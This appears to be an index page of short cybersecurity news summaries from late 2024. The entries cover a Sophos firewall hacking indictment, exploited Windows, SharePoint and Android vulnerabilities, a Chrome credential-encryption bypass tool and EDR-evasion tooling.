December 11, 2024 at 01:36AM The U.S. government charged Chinese national Guan Tianfeng for hacking thousands of Sophos firewalls in 2020, exploiting a severe zero-day vulnerability. He allegedly conspired to access and exfiltrate data, targeting critical U.S. infrastructure. Sanctions were imposed against his company, Sichuan Silence, linked to Chinese intelligence agencies. ### Meeting Takeaways from … Read more
December 11, 2024 at 12:06AM The US Treasury and Justice Departments have identified a Chinese firm and an employee, Guan Tianfeng, as responsible for exploiting a 2020 vulnerability in Sophos firewalls. An indictment claims they tested the firewalls to deliver malware, compromising 81,000 devices. Rewards and sanctions have been announced against them. ### Meeting Takeaways … Read more
December 9, 2024 at 03:03PM Researchers from Mandiant have demonstrated a method to bypass browser isolation using QR codes, allowing attackers to transmit commands to compromised devices. This technique exploits remote rendering processes to convey data visually, though it faces limitations, including latency and QR code size constraints. Mandiant still endorses browser isolation as a … Read more
November 26, 2024 at 10:02AM Ransomware attacks are increasing, prompting the White House to hold international discussions. IBM addresses these threats by enhancing its storage systems with computational storage technology that detects ransomware at the block level. This early detection helps organizations respond promptly, reducing the potential damage and recovery effort after an attack. **Meeting … Read more
November 13, 2024 at 04:37PM Suspected Russian hackers exploited a recently patched Windows vulnerability (CVE-2024-43451) targeting Ukrainian entities. This NTLM Hash Disclosure flaw allows attackers to steal user login credentials via phishing emails. Microsoft confirmed the vulnerability’s exploitation requires minimal user interaction and has affected all supported Windows versions, prompting CISA to issue a security … Read more
November 5, 2024 at 07:04AM Google has addressed two vulnerabilities in the latest Android security update, noting that they were exploited in limited, targeted attacks. The company emphasizes the importance of applying the update to enhance device security. **Meeting Takeaways:** 1. **Vendor Alert:** Google has issued a warning regarding the exploitation of two vulnerabilities in … Read more
November 2, 2024 at 07:40PM A Microsoft SharePoint vulnerability (CVE-2024-38094) is being actively exploited for unauthorized network access. Attackers exploited this RCE flaw to compromise systems, disable security measures, and conduct lateral movement within networks. Rapid7’s report highlights an ongoing threat, urging administrators to apply updates from July 2024 promptly to mitigate risks. **Meeting Takeaways** … Read more
October 28, 2024 at 05:08PM A cybersecurity researcher, Alexander Hagenah, has released a tool that bypasses Google’s App-Bound encryption, enabling the extraction of saved credentials from Chrome. While it reflects a method similar to existing infostealer malware, its public availability increases risks for users storing sensitive data in the browser. Google is aware of the … Read more
October 21, 2024 at 11:32AM Cybercriminals are using new anti-bot services from the Dark Web to bypass Google’s Red Page warning against phishing attacks. These services filter out security crawlers and utilize techniques like cloaking and CAPTCHA to disguise malicious sites. This development complicates detection efforts, increasing risks for individuals and enterprises alike. **Meeting Takeaways: … Read more
October 16, 2024 at 04:09PM EDRSilencer, an open-source tool used in red-team operations, is being exploited by threat actors to disable security alerts and evade detection by blocking 16 common EDR tools. This shift enhances stealth for malicious activities, prompting researchers to advise organizations to adopt advanced detection and threat-hunting strategies. ### Meeting Takeaways: 1. … Read more